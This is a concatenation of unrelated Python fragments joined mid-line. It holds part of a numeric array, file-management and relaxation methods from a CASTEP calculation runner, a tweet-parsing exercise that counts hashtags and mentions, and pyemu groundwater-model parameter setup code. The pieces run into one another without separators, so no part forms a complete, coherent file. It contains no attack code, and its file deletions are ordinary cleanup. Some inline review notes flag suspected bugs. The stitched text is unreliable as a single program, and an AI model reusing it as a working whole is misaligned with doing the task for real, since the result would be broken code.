0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [774, 33.5, 0, 9999, -9999, 1.0, 100, 1, 33.5, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [776, 56.0, 0, 9999, -9999, 1.0, 100, 1, 56.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [777, 79.0, 0, 9999, -9999, 1.0, 100, 1, 79.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [778, 14.7, 0, 9999, -9999, 1.0, 100, 1, 14.7, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [781, 976.341466, 0, 9999, -9999, 1.0, 100, 1, 1310.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [784, 893.715747, 0, 9999, -9999, 1.0, 100, 1, 1275.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [785, 3.0, 0, 9999, -9999, 1.0, 100, 1, 3.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [787, 778.0, 0, 9999, -9999, 1.0, 100, 1, 778.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [788, 875.0, 0, 9999, -9999, 1.0, 100, 1, 875.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [789, 77.4, 0, 9999, -9999, 1.0, 100, 1, 77.4, 0.0, 0, 0, 0, 0, 0, 0, 0,
for structure.

        Keyword arguments:
            completed_dir (str): folder for completed jobs.
            keep (bool): whether to also move intermediate files.
            skip_existing (bool): if True, skip files that already exist,
                otherwise throw an error.

        """
        completed_dir = self.root_folder + '/' + completed_dir
        LOG.info('Moving files to completed: {completed}'.format(completed=completed_dir))
        # normalise to the bare seed name so the glob patterns below match
        if seed.endswith('.res'):
            seed = str(seed.replace('.res', ''))
        if not os.path.exists(completed_dir):
            os.makedirs(completed_dir, exist_ok=True)
        # backup and lock files are never kept, regardless of `keep`
        for _file in glob.glob(seed + '*_bak') + glob.glob(seed + '*.lock'):
            os.remove(_file)
        if keep:
            # move everything related to this seed, intermediates included
            seed_files = glob.glob(seed + '.*') + glob.glob(seed + '-out.cell*')
            if seed_files:
                LOG.debug('Files to move: {files}.'.format(files=seed_files))
                for _file in seed_files:
                    if skip_existing and os.path.isfile(completed_dir + '/' + _file):
                        LOG.warning('File already found {}...'.format(_file))
                    else:
                        shutil.move(_file, completed_dir)
        else:
            # move castep/param/res/out_cell files to completed
            file_exts = ['.castep']
            if self.kpts_1D:
                file_exts.append('.param')
            if not self.conv_kpt_bool and not self.conv_cutoff_bool:
                file_exts.append('.res')
            if os.path.isfile(seed + '-out.cell'):
                file_exts.append('-out.cell')
            if self.calc_doc.get('write_formatted_density'):
                file_exts.append('.den_fmt')
            for ext in file_exts:
                # best-effort move: a missing file is logged, not fatal
                try:
                    shutil.move('{}{}'.format(seed, ext), completed_dir)
                except Exception as exc:
                    LOG.warning('Error moving files to completed: {error}'.format(error=exc))
            # delete whatever is left
            wildcard_fnames = glob.glob(seed + '.*')
            wildcard_fnames += glob.glob(seed + '-out.*')
            for fname in wildcard_fnames:
                os.remove(fname)

    def cp_to_input(self, seed, ext='res', glob_files=False):
        """ Copy initial cell and res to input folder.

        Only acts on the first run (guarded by self._first_run); existing
        files in the input folder are never overwritten.

        Parameters:
            seed (str): filename of structure.

        Keyword arguments:
            ext (str): file extension for structure.
            glob_files (bool): whether to glob all related seed files.

        """
        if not self._first_run:
            return
        input_dir = self.root_folder + '/input'
        LOG.debug('Copying file to input_dir: {input}'.format(input=input_dir))
        if not os.path.exists(input_dir):
            os.makedirs(input_dir, exist_ok=True)
        if glob_files:
            # copy every seed-related file except lock files
            files = glob.glob('{}.*'.format(seed))
            LOG.debug('Files to copy: {files}'.format(files=files))
            for f in files:
                if f.endswith('.lock'):
                    continue
                if not os.path.isfile(input_dir + '/' + f):
                    shutil.copy2('{}'.format(f), input_dir)
        else:
            # copy only the single seed.<ext> file
            LOG.debug('File to copy: {file}'.format(file='{}.{}'.format(seed, ext)))
            if os.path.isfile('{}.{}'.format(seed, ext)):
                if not os.path.isfile('{}/{}.{}'.format(input_dir, seed, ext)):
                    shutil.copy2('{}.{}'.format(seed, ext), input_dir)

    def _setup_relaxation(self):
        """ Set up directories and files for relaxation.

        Prepares the compute directory, refreshes the res file from any newer
        intermediate .castep result, then builds the rough/fine geometry
        optimisation iteration scheme in self._geom_max_iter_list.

        Raises:
            CalculationError: if structure has already exceeded geom_max_iter.
            CriticalError: if unable to split up calculation, normally
                indicating geom_max_iter is too small.

        """
        LOG.info('Preparing to relax {seed}'.format(seed=self.seed))
        self._setup_compute_dir(self.seed, self.compute_dir, custom_params=self.custom_params)
        # update res file with intermediate calculation if castep file is newer than res
        if os.path.isfile(self.seed + '.castep') and os.path.isfile(self.seed + '.res'):
            LOG.info('Trying to update res file with result from intermediate CASTEP file found in root_dir')
            if self.compute_dir is not None:
                shutil.copy2(self.seed + '.castep', self.compute_dir)
            castep_dict, success = castep2dict(self.seed + '.castep', db=False, verbosity=self.verbosity)
            if success:
                self.res_dict['geom_iter'] = castep_dict.get('geom_iter', 0)
                # mtime comparison decides which structure is fresher
                if os.path.getmtime(self.seed + '.res') < os.path.getmtime(self.seed + '.castep'):
                    LOG.info('CASTEP file was updated more recently than res file, using intermediate structure...')
                    self.res_dict.update(castep_dict)
        if self.compute_dir is not None:
            os.chdir(self.compute_dir)
        # copy initial res file to seed
        LOG.info('Writing fresh res file to start calculation from.')
        doc2res(self.res_dict, self.seed, info=False, hash_dupe=False, overwrite=True)
        self.cp_to_input(self.seed)
        # set up geom opt iteration options based on input/scraped parameters
        self._max_iter = self.calc_doc['geom_max_iter']
        if self.res_dict.get('geom_iter'):
            self._max_iter -= self.res_dict['geom_iter']
        else:
            self.res_dict['geom_iter'] = 0
        if self.res_dict['geom_iter'] > self.calc_doc['geom_max_iter']:
            msg = '{} iterations already performed on structure, exiting...'.format(self.res_dict['geom_iter'])
            LOG.critical(msg)
            raise CalculationError(msg)
        # number of steps in fine and rough calcs respectively
        fine_iter = self.fine_iter
        rough_iter = self.rough_iter
        # number of calculations to run with rough_iter steps
        num_rough_iter = self.rough
        if 'geom_method' in self.calc_doc:
            # TPSD needs at least 3 steps per chunk to make progress
            if self.calc_doc['geom_method'].lower() == 'tpsd' and rough_iter < 3:
                rough_iter = 3
        self._geom_max_iter_list = (num_rough_iter * [rough_iter])
        self._max_iter -= num_rough_iter * rough_iter
        if self.squeeze:
            self._squeeze_list = [True for val in self._geom_max_iter_list]
        else:
            self._squeeze_list = [False for val in self._geom_max_iter_list]
        num_fine_iter = ceil(int(self._max_iter) / fine_iter)
        if self._max_iter > 0:
            if self._max_iter < fine_iter:
                fine_iter = self._max_iter
                num_fine_iter = 1
            self._geom_max_iter_list.extend(num_fine_iter * [fine_iter])
            self._squeeze_list.extend(num_fine_iter * [False])
        LOG.info('Geometry optimisation iteration scheme set to {}'.format(self._geom_max_iter_list))
        if self.squeeze:
            # NOTE(review): this logs _geom_max_iter_list; presumably
            # self._squeeze_list was intended here -- confirm
            LOG.info('Squeeze scheme set to {}'.format(self._geom_max_iter_list))
        if not self._geom_max_iter_list:
            msg = 'Could not divide up relaxation; consider increasing geom_max_iter'
            LOG.critical(msg)
            raise CriticalError(msg)

    def _update_input_files(self, seed, calc_doc, squeeze=None):
        """ Update the cell and param files for the next relaxation.

        Parameters:
            seed (str): the seedname to update.
            calc_doc (dict): the calculation dictionary to write to file.
Keyword arguments:
            squeeze (float): external pressure to add this step

        """
        if seed is None:
            seed = self.seed
        # work on a deep copy so the caller's calc_doc is (mostly) untouched
        this_calc_doc = deepcopy(calc_doc)
        # update cell
        if os.path.isfile(seed + '.cell'):
            os.remove(seed + '.cell')
        if squeeze is not None:
            if squeeze:
                LOG.info('Applying pressure of {} GPa to this calculation'.format(squeeze))
                # isotropic pressure tensor
                this_calc_doc['external_pressure'] = [[squeeze, 0, 0], [0, squeeze, 0], [0, 0, squeeze]]
            else:
                LOG.info('Pressure reset to {}'.format(self._target_pressure))
                this_calc_doc['external_pressure'] = self._target_pressure
        if self.kpts_1D:
            # only the z-direction is sampled; force an even kpoint count
            n_kz = ceil(1 / (this_calc_doc['lattice_abc'][0][2] * self._target_spacing))
            if n_kz % 2 == 1:
                n_kz += 1
            this_calc_doc['kpoints_mp_grid'] = [1, 1, n_kz]
            # NOTE(review): this deletes from the caller's calc_doc, not the
            # local copy -- confirm this side effect is intended
            if 'kpoints_mp_spacing' in calc_doc:
                del calc_doc['kpoints_mp_spacing']
        doc2cell(this_calc_doc, seed, hash_dupe=False, spin=self.spin)
        # update param
        if not self.custom_params:
            if os.path.isfile(seed + '.param'):
                os.remove(seed + '.param')
            doc2param(this_calc_doc, seed, hash_dupe=False, spin=self.spin)
        LOG.debug('Calculation dictionary: {}'
                  .format(matador.utils.print_utils.dumps(this_calc_doc, indent=None)))

    def tidy_up(self, seed):
        """ Delete all created files before quitting.

        Parameters:
            seed (str): filename for structure.

        """
        files = glob.glob(seed + '.*')
        if self.compute_dir is not None:
            files += glob.glob(self.root_folder + '/' + seed + '.*')
        if files:
            LOG.info('Tidying up remaining files: {files}'.format(files=files))
        for f in files:
            # if we're working in a compute dir, then delete any remaining files in base dir
            # otherwise, only delete things that we dont care about, i.e. non-res/castep in
            # case they were not correctly moved to completed/bad_castep by the other routines
            if self.compute_dir is not None or (not (f.endswith('.res') or f.endswith('.castep'))):
                os.remove(f)

    def _update_castep_output_files(self, seed, opti_dict=None):
        """ Copy new data to root CASTEP output files and update the results dict.

        Keyword arguments:
            opti_dict (dict): intermediate calculation results.

        """
        LOG.info('Updating .res and .castep files in root_dir with new results')
        if opti_dict is not None:
            # keep a .res_bak backup until the fresh res file is written
            if os.path.isfile(seed + '.res'):
                os.rename('{}.res'.format(seed), '{}.res_bak'.format(seed))
            try:
                doc2res(opti_dict, seed, hash_dupe=False)
            except CalculationError:
                # retry without the info block if writing failed
                doc2res(opti_dict, seed, hash_dupe=False, info=False)
            if os.path.isfile(seed + '.res_bak'):
                os.remove(seed + '.res_bak')
            self.res_dict.update(opti_dict)
        if self.compute_dir is not None:
            # mirror results back into the root folder
            if os.path.isfile(seed + '.res'):
                shutil.copy2(seed + '.res', self.root_folder)
            if os.path.isfile(seed + '.castep'):
                shutil.copy2(seed + '.castep', self.root_folder)

    def _finalise_result(self, intermediate=False):
        """ Push to queue if necessary and return status.

        Keyword arguments:
            intermediate (bool): whether we want to run more calculations on
                the output of this, i.e. whether to move to completed or not.

        Returns:
            bool: True is relaxation was successful, False otherwise.

        """
        LOG.info('Finalising calculation...')
        try:
            success = self.res_dict.get('optimised', False)
        except AttributeError:
            # res_dict may not be a dict at all if scraping failed
            success = False
        LOG.info('Was calculation successful? {success}'.format(success=success))
        if self.output_queue is not None:
            LOG.info('Pushing results to output queue')
            self.output_queue.put(self.res_dict)
        if success:
            if not intermediate:
                self.mv_to_completed(self.seed, completed_dir=self.paths['completed_dir'])
        else:
            self.mv_to_bad(self.seed)
        if success:
            self.final_result = self.res_dict
        if not intermediate:
            # clean up rest of files
            self.tidy_up(self.seed)
        return success

    def _times_up(self, process):
        """ If walltime has nearly expired, run this function to kill the
        process and unlock it for restarted calculations.

        Parameters:
            subprocess.Popen: running process to be killed.
""" if self.compute_dir is not None: LOG.info('Cleaning up compute_dir: {dir}'.format(dir=self.compute_dir)) for f in glob.glob('{}.*'.format(self.seed)): shutil.copy2(f, self.root_folder) os.remove(f) LOG.info('Removing lock file so calculation can be continued.') if os.path.isfile('{}/{}{}'.format(self.root_folder, self.seed, '.res.lock')): os.remove('{}/{}{}'.format(self.root_folder, self.seed, '.res.lock')) @staticmethod def remove_compute_dir_if_finished(compute_dir): """ Delete the compute directory, provided it contains no calculation data. Parameters: compute_dir (str): path to compute directory. Returns: bool: True if folder was deleted as no res/castep files were found, otherwise False. """ LOG.info('Checking if compute_dir still contains calculations...') if not os.path.isdir(compute_dir): return False files = glob.glob(compute_dir + '/*') LOG.debug('Found {files} in {dir}'.format(files=files, dir=compute_dir)) for fname in files: if fname.endswith('.res') or fname.endswith('.castep'): LOG.debug('Not removing {dir} as it still contains calculation {fname}'.format( dir=compute_dir, fname=fname)) return False # remove files in directory, then delete directory LOG.debug('Deleting files {files} from {dir}'.format(files=files, dir=compute_dir)) for fname in files: if os.path.isfile(fname): try: os.remove(fname) except FileNotFoundError: pass if os.path.isdir(compute_dir): LOG.debug('Deleting directory {dir}'.format(dir=compute_dir)) try: os.rmdir(compute_dir) except OSError: LOG.debug('Unable to delete directory {} as it still contains files.'.format(compute_dir)) if os.path.islink(compute_dir.split('/')[-1] + '_link'): os.remove(compute_dir.split('/')[-1] + '_link') return True def _setup_compute_dir(self, seed, compute_dir, custom_params=False, generic=False): """ Create the desired directory if it doens't exist, and try to link to it in the current folder. Parameters: seed (str): name of seed. compute_dir (str): name of directory to make. 
Keyword arguments: custom_params (bool): whether to try to copy custom param files into this directory. """ if compute_dir is None: return LOG.info('Using compute_dir: {}'.format(compute_dir)) if not os.path.isdir(compute_dir): try: os.makedirs(compute_dir, exist_ok=True) except PermissionError as exc: raise
TIE = "Tie" HEADER_LENGTH = 6 ANONYMOUS = 'unknown' # A helper that splits the string into a list of words. def get_pure_wordlist(tweet): """ (str) -> list of str Return a list of string containing all words ending with alphanumerics. >>> get_pure_wordlist('Hello! @Leehom- @StarWay.') ['hello', '@leehom', '@starway'] >>> get_pure_wordlist('@Here: @1223 @here: me') ['@here', '@1223', '@here', 'me'] """ result = [] wordlist = tweet.split() for word in wordlist: if not word[-1].isalnum(): result.append(word.lower()[:len(word) - 1]) else: result.append(word.lower()) return result # 1. def extract_mentions(tweet): """ (str) -> list of str Precondition: 1 <= len(tweet) <= 140. Return a list of string containing all of the mentions in the tweet. >>> extract_mentions('Hello! @Leehom- @StarWay.') ['leehom', 'starway'] >>> extract_mentions('@Here: @1223 @Gu&a$ @here: me @...') ['here', '1223', 'gu', 'here', ''] """ result = [] lst = get_pure_wordlist(tweet) for word in lst: # set initial index for index in word i = 1 if word.startswith('@'): # move index to the right if the ith character is alphanumeric while i < len(word) and word[i].isalnum(): i = i + 1 result.append(word[1:i]) return result # 2. def extract_hashtags(tweet): """ (str) -> list of str Return a list of strings containing all unique hashtags in the tweet. >>> extract_hashtags('I love #autumn, #fall%3525 and want to #fall') ['autumn', 'fall'] >>> extract_hashtags('#Life is so hard, #keep up with #life- #...') ['life', 'keep', ''] """ result = [] # loop over words from lowercase pure wordlist for word in get_pure_wordlist(tweet): i = 1 if word.startswith('#') and len(word) >= 2: while i < len(word) and word[i].isalnum(): i = i + 1 if word[1:i] not in result: result.append(word[1:i]) return result # 3. def count_words(tweet, dic): """ (str, dict of {str: int}) -> None Update the counts of words from the tweet in the dic. >>> tweet = "@utmandrew Don't you wish you? 
#MakeAmerican" >>> dic = {'you': 1, 'fun': 4} >>> count_words(tweet, dic) >>> dic == {'you': 3, 'wish': 1, 'fun': 4, 'dont': 1} True """ for word in get_pure_wordlist(tweet): for item in range(1, len(word) - 1): # remove non alphanumeric characters from each word if not word[item].isalnum(): word = word[:item] +word[item + 1:] if word[0] != '@' and word[0] != '#' and not word.startswith('http'): # add word that are not in dic, assign value 1 if word not in dic: dic[word] = 1 # add value to the original value plus 1 for those already in dic elif word in dic: dic[word] = dic[word] + 1 #4 def common_words(dic, N): """(dict of {str: int}, int) -> None Update the dic so that it contains only N most frequent words. >>> dic = {'I': 10, 'you': 5, 'miss': 8, 'here': 6, 'how': 6} >>> common_words(dic, 3) >>> dic == {'I': 10, 'miss': 8} True >>> dic = {'I':10, 'you': 5, 'miss': 8, 'here': 2, 'how': 6} >>> common_words(dic, 6) >>> dic == {'I': 10, 'you': 5, 'miss': 8, 'here': 2, 'how': 6} True """ ndic = {} # get a list of sorted words wordlist = sorted(dic, key = dic.get, reverse = True) # loop over the wordlist to find words that has frequency not equal to N+1 if len(dic) > N: for i in range(N): if dic[wordlist[i]] != dic[wordlist[N]]: # if the frequency is not equal to N+1 th, put it into ndic ndic[wordlist[i]] = dic[wordlist[i]] # when the foor loop is over, clear dic dic.clear() # update the dic by ndic that is generated above dic.update(ndic) # 5. 
def read_tweets(file):
    """ (file open for reading) -> dict of {str: list of tweet tuples}

    Return a dictionary with the names of the candidates as keys, and tweet
    tuples in the form (candidate, tweet text, date, source, favorite count,
    retweet count) as values.
    """
    dic = {}
    key = ""
    content = []
    for line in file:
        # a candidate-name line looks like "First [Middle [...]] Last:\n"
        if line.endswith(':\n') and 2 <= len(line.split()) <= 4:
            key = line.strip()[:-1]
            # store the candidate as a key in dic
            dic[key] = []
        elif line != "<<<EOT\n":
            # accumulate header and text lines until the end-of-tweet marker
            content.append(line)
        else:
            # end of tweet: use a helper to parse the accumulated lines
            help_read_tweet(dic, key, content)
            content = []
    return dic


def help_read_tweet(dic, key, content):
    """ (dict, str, list of str) -> None

    Parse the accumulated lines of one tweet (a header line plus text lines)
    and append the resulting tweet tuple to dic[key].

    >>> dic = {'A': []}
    >>> help_read_tweet(dic, 'A', ['7,1,Q NY,iPhone,1,5\\n', '#MAGA\\n'])
    >>> dic
    {'A': [('A', '#MAGA\\n', 1, 'iPhone', 1, 5)]}
    """
    txt = ""
    for s in content:
        # the header line has exactly HEADER_LENGTH comma-separated fields
        # and starts with a numeric tweet id
        if len(s.split(',')) == HEADER_LENGTH and s.split(',')[0].isnumeric():
            info = s.split(',')
        else:
            txt += s
    value = (key, txt, int(info[1]), info[3], int(info[4]), int(info[5][:-1]))
    dic[key].append(value)


# 6.
def most_popular(dic, d1, d2):
    """ (dict of {str: list of tweet tuples}, int, int) -> str

    Precondition: d1 <= d2

    Return the most popular candidate on Twitter between dates d1 and d2,
    where popularity is the sum of favorite and retweet counts.  In the
    case of a tie, return the string "Tie".
    """
    # build a popularity-count dictionary for each candidate
    cdic = {}
    for candidate in dic:
        # fix: counts must reset per candidate (it previously accumulated
        # across candidates)
        counts = 0
        for tweet in dic[candidate]:
            # only count tweets inside the required time period
            if d1 <= tweet[2] <= d2:
                counts += tweet[-1] + tweet[-2]
        cdic[candidate] = counts
    # fix: rank by the counts in cdic (the original sorted/compared the
    # tweet lists in dic instead)
    popular_list = sorted(cdic, key=cdic.get, reverse=True)
    if not popular_list:
        return TIE
    if len(popular_list) == 1 or cdic[popular_list[0]] != cdic[popular_list[1]]:
        return popular_list[0]
    return TIE


# 7.
def detect_author(dic, tweet):
    """(dict of {str: list of tweet tuples}, str) -> str

    Return the username of the most likely author of that tweet.  If the
    tweet contains exactly one hashtag that only one of the candidates
    uses, the likely author is that candidate; otherwise return ANONYMOUS.

    >>> dic = {'D': [('D', '#a #i', 1, 'e', 0, 7)], 'M': [('M', '#... #a',\
 1, 'e', 0, 7)]}
    >>> tweet = "hi! #i"
    >>> detect_author(dic, tweet)
    'D'
    """
    # compute the unique-hashtag -> candidate map once (the original
    # recomputed it for every hashtag in the tweet)
    unique = unique_hashtag(all_hashtag(dic))
    matched = [ht for ht in extract_hashtags(tweet) if ht in unique]
    if len(matched) == 1:
        return unique[matched[0]]
    return ANONYMOUS


# helper that collects the hashtags used by each candidate
def all_hashtag(dic):
    """(dict of {str: list of tweet tuples}) -> dict of {str: list of str}

    Return a dictionary of all hashtags used by each candidate in dic,
    without duplicates.

    >>> dic = {'D': [('D', 'F #i', 8, 't', 2, 3), ('D', '#...', 1, 'e', 0, 7)]}
    >>> all_hashtag(dic)
    {'D': ['i', '']}
    """
    ndic = {}
    for candidate in dic:
        hashtags = []
        for tweet in dic[candidate]:
            for ht in extract_hashtags(tweet[1]):
                # fix: the original membership test compared a whole list
                # against string elements, so duplicates were never filtered
                if ht not in hashtags:
                    hashtags.append(ht)
        ndic[candidate] = hashtags
    return ndic


# helper function that finds all unique hashtags for each candidate
def unique_hashtag(dic):
    """dict of {str: list of str} -> dict of {str: str}

    Return a dictionary mapping each hashtag used by exactly one candidate
    in dic to that candidate.

    >>> dic = {'D': ['a', '1', '2'], 'M': ['a', 'i'], 'N': ['1', '0', '']}
    >>> unique_hashtag(dic) == {'2': 'D', 'i': 'M', '0': 'N', '': 'N'}
    True
    """
    # NOTE(review): the original source was truncated mid-function here;
    # this body is reconstructed from the documented contract and doctest.
    owner = {}  # hashtag -> candidate, or None once a second candidate uses it
    for candidate in dic:
        for ht in set(dic[candidate]):
            if ht not in owner:
                owner[ht] = candidate
            elif owner[ht] != candidate:
                owner[ht] = None
    return {ht: cand for ht, cand in owner.items() if cand is not None}
# ll in layers[i+1:]:
        #     pp = set(kl_dict[ll])
        #     d = pp - p
        #     kl_dict[ll] = list(d)
        kl_prefix = list(kl_df.loc[:, "prefix"])
        kl_array_file = {p: m for p, m in zip(kl_df.prefix, kl_df.mlt_file)}
        self.logger.statement("kl_prefix: {0}".format(str(kl_prefix)))
        fac_file = os.path.join(self.m.model_ws, "kl.fac")
        self.log("calling kl_setup() with factors file {0}".format(fac_file))
        kl_df = kl_setup(
            self.kl_num_eig,
            self.m.sr,
            self.kl_geostruct,
            kl_prefix,
            factors_file=fac_file,
            basis_file=fac_file + ".basis.jcb",
            tpl_dir=self.m.model_ws,
        )
        self.logger.statement("{0} kl parameters created".format(kl_df.shape[0]))
        self.logger.statement("kl 'pargp':{0}".format(",".join(kl_df.pargp.unique())))
        self.log("calling kl_setup() with factors file {0}".format(fac_file))
        kl_mlt_df = mlt_df.loc[mlt_df.suffix == self.kl_suffix]
        # wire each kl prefix's input/factors files into the multiplier dataframe
        for prefix in kl_df.prefix.unique():
            prefix_df = kl_df.loc[kl_df.prefix == prefix, :]
            in_file = os.path.split(prefix_df.loc[:, "in_file"].iloc[0])[-1]
            assert prefix in mlt_df.prefix.values, "{0}:{1}".format(
                prefix, mlt_df.prefix
            )
            mlt_df.loc[mlt_df.prefix == prefix, "pp_file"] = in_file
            mlt_df.loc[mlt_df.prefix == prefix, "fac_file"] = os.path.split(fac_file)[
                -1
            ]
            mlt_df.loc[mlt_df.prefix == prefix, "pp_fill_value"] = 1.0
            mlt_df.loc[mlt_df.prefix == prefix, "pp_lower_limit"] = 1.0e-10
            mlt_df.loc[mlt_df.prefix == prefix, "pp_upper_limit"] = 1.0e+10
        # NOTE(review): bare print() looks like leftover debugging output
        print(kl_mlt_df)
        mlt_df.loc[mlt_df.suffix == self.kl_suffix, "tpl_file"] = np.NaN
        self.par_dfs[self.kl_suffix] = kl_df
        # calc factors for each layer

    def _setup_array_pars(self):
        """main entry point for setting up array multipler parameters:
        builds template files (const/grid/zone) for every multiplier array,
        registers the resulting parameter dataframes, and test-runs
        apply_array_pars()."""
        mlt_df = self._prep_mlt_arrays()
        if mlt_df is None:
            return
        mlt_df.loc[:, "tpl_file"] = mlt_df.mlt_file.apply(
            lambda x: os.path.split(x)[-1] + ".tpl"
        )
        # mlt_df.loc[mlt_df.tpl_file.apply(lambda x:pd.notnull(x.pp_file)),"tpl_file"] = np.NaN
        mlt_files = mlt_df.mlt_file.unique()
        # for suffix,tpl_file,layer,name in zip(self.mlt_df.suffix,
        #                  self.mlt_df.tpl,self.mlt_df.layer,
        #                  self.mlt_df.prefix):
        par_dfs = {}
        for mlt_file in mlt_files:
            # each mlt_file must map to exactly one suffix/tpl/name/attr_name
            suffixes = mlt_df.loc[mlt_df.mlt_file == mlt_file, "suffix"]
            if suffixes.unique().shape[0] != 1:
                self.logger.lraise("wrong number of suffixes for {0}".format(mlt_file))
            suffix = suffixes.iloc[0]
            tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"]
            if tpl_files.unique().shape[0] != 1:
                self.logger.lraise("wrong number of tpl_files for {0}".format(mlt_file))
            tpl_file = tpl_files.iloc[0]
            layers = mlt_df.loc[mlt_df.mlt_file == mlt_file, "layer"]
            # if layers.unique().shape[0] != 1:
            #     self.logger.lraise("wrong number of layers for {0}"\
            #                        .format(mlt_file))
            layer = layers.iloc[0]
            names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "prefix"]
            if names.unique().shape[0] != 1:
                self.logger.lraise("wrong number of names for {0}".format(mlt_file))
            name = names.iloc[0]
            attr_names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "attr_name"]
            if attr_names.unique().shape[0] != 1:
                self.logger.lraise(
                    "wrong number of attr_names for {0}".format(mlt_file)
                )
            attr_name = attr_names.iloc[0]
            # ib = self.k_zone_dict[layer]
            df = None
            # NOTE(review): the paired self.log(...) calls before/after each
            # writer appear to mark start/finish of a timed section -- confirm
            if suffix == self.cn_suffix:
                self.log("writing const tpl:{0}".format(tpl_file))
                # df = self.write_const_tpl(name,tpl_file,self.m.bas6.ibound[layer].array)
                try:
                    df = write_const_tpl(
                        name,
                        os.path.join(self.m.model_ws, tpl_file),
                        self.cn_suffix,
                        self.m.bas6.ibound[layer].array,
                        (self.m.nrow, self.m.ncol),
                        self.m.sr,
                    )
                except Exception as e:
                    self.logger.lraise(
                        "error writing const template: {0}".format(str(e))
                    )
                self.log("writing const tpl:{0}".format(tpl_file))
            elif suffix == self.gr_suffix:
                self.log("writing grid tpl:{0}".format(tpl_file))
                # df = self.write_grid_tpl(name,tpl_file,self.m.bas6.ibound[layer].array)
                try:
                    df = write_grid_tpl(
                        name,
                        os.path.join(self.m.model_ws, tpl_file),
                        self.gr_suffix,
                        self.m.bas6.ibound[layer].array,
                        (self.m.nrow, self.m.ncol),
                        self.m.sr,
                    )
                except Exception as e:
                    self.logger.lraise(
                        "error writing grid template: {0}".format(str(e))
                    )
                self.log("writing grid tpl:{0}".format(tpl_file))
            elif suffix == self.zn_suffix:
                self.log("writing zone tpl:{0}".format(tpl_file))
                if np.all(
                    [isinstance(v, dict) for v in self.k_zone_dict.values()]
                ):  # check is dict of dicts
                    if attr_name in [p.split(".")[-1] for p in self.k_zone_dict.keys()]:
                        k_zone_dict = next(
                            k_dict
                            for p, k_dict in self.k_zone_dict.items()
                            if p.split(".")[-1] == attr_name
                        )  # get dict relating to parameter prefix
                    else:
                        assert (
                            "general_zn" in self.k_zone_dict.keys()
                        ), "Neither {0} nor 'general_zn' are in k_zone_dict keys: {1}".format(
                            attr_name, self.k_zone_dict.keys()
                        )
                        k_zone_dict = self.k_zone_dict["general_zn"]
                else:
                    k_zone_dict = self.k_zone_dict
                # df = self.write_zone_tpl(self.m, name, tpl_file, self.k_zone_dict[layer], self.zn_suffix, self.logger)
                try:
                    df = write_zone_tpl(
                        name,
                        os.path.join(self.m.model_ws, tpl_file),
                        self.zn_suffix,
                        k_zone_dict[layer],
                        (self.m.nrow, self.m.ncol),
                        self.m.sr,
                    )
                except Exception as e:
                    self.logger.lraise(
                        "error writing zone template: {0}".format(str(e))
                    )
                self.log("writing zone tpl:{0}".format(tpl_file))
            if df is None:
                continue
            if suffix not in par_dfs:
                par_dfs[suffix] = [df]
            else:
                par_dfs[suffix].append(df)
        for suf, dfs in par_dfs.items():
            self.par_dfs[suf] = pd.concat(dfs)
        # dispatch the per-style preparation steps
        if self.pp_suffix in mlt_df.suffix.values:
            self.log("setting up pilot point process")
            self._pp_prep(mlt_df)
            self.log("setting up pilot point process")
        if self.gr_suffix in mlt_df.suffix.values:
            self.log("setting up grid process")
            self._grid_prep()
            self.log("setting up grid process")
        if self.kl_suffix in mlt_df.suffix.values:
            self.log("setting up kl process")
            self._kl_prep(mlt_df)
            self.log("setting up kl process")
        mlt_df.to_csv(os.path.join(self.m.model_ws, "arr_pars.csv"))
        # write placeholder (all-ones) multiplier arrays for the test run
        ones = np.ones((self.m.nrow, self.m.ncol))
        for mlt_file in mlt_df.mlt_file.unique():
            self.log("save test mlt array {0}".format(mlt_file))
            np.savetxt(os.path.join(self.m.model_ws, mlt_file), ones, fmt="%15.6E")
            self.log("save test mlt array {0}".format(mlt_file))
            tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"]
            if tpl_files.unique().shape[0] != 1:
                self.logger.lraise("wrong number of tpl_files for {0}".format(mlt_file))
            tpl_file = tpl_files.iloc[0]
            if pd.notnull(tpl_file):
                self.tpl_files.append(tpl_file)
                self.in_files.append(mlt_file)
        # for tpl_file,mlt_file in zip(mlt_df.tpl_file,mlt_df.mlt_file):
        #     if pd.isnull(tpl_file):
        #         continue
        #     self.tpl_files.append(tpl_file)
        #     self.in_files.append(mlt_file)
        # test-run the forward-run helper from inside the model workspace
        os.chdir(self.m.model_ws)
        try:
            apply_array_pars()
        except Exception as e:
            os.chdir("..")
            self.logger.lraise(
                "error test running apply_array_pars():{0}".format(str(e))
            )
        os.chdir("..")
        line = "pyemu.helpers.apply_array_pars()\n"
        self.logger.statement("forward_run line:{0}".format(line))
        self.frun_pre_lines.append(line)

    def _setup_observations(self):
        """main entry point for setting up observations: runs each
        per-type setup method in turn."""
        obs_methods = [
            self._setup_water_budget_obs,
            self._setup_hyd,
            self._setup_smp,
            self._setup_hob,
            self._setup_hds,
            self._setup_sfr_obs,
        ]
        obs_types = [
            "mflist water budget obs",
            "hyd file",
            "external obs-sim smp files",
            "hob",
            "hds",
            "sfr",
        ]
        self.obs_dfs = {}
        for obs_method, obs_type in zip(obs_methods, obs_types):
            self.log("processing obs type {0}".format(obs_type))
            obs_method()
            self.log("processing obs type {0}".format(obs_type))

    def draw(self, num_reals=100, sigma_range=6, use_specsim=False, scale_offset=True):
        """draw from the geostatistically-implied parameter covariance matrix

        Args:
            num_reals (`int`): number of realizations to generate. Default is 100
            sigma_range (`float`): number of standard deviations represented by
                the parameter bounds. Default is 6.
            use_specsim (`bool`): flag to use spectral simulation for grid-based
                parameters. Requires a regular grid but is wicked fast. Default is False
            scale_offset (`bool`, optional): flag to apply scale and offset to
                parameter bounds when calculating variances - this is passed
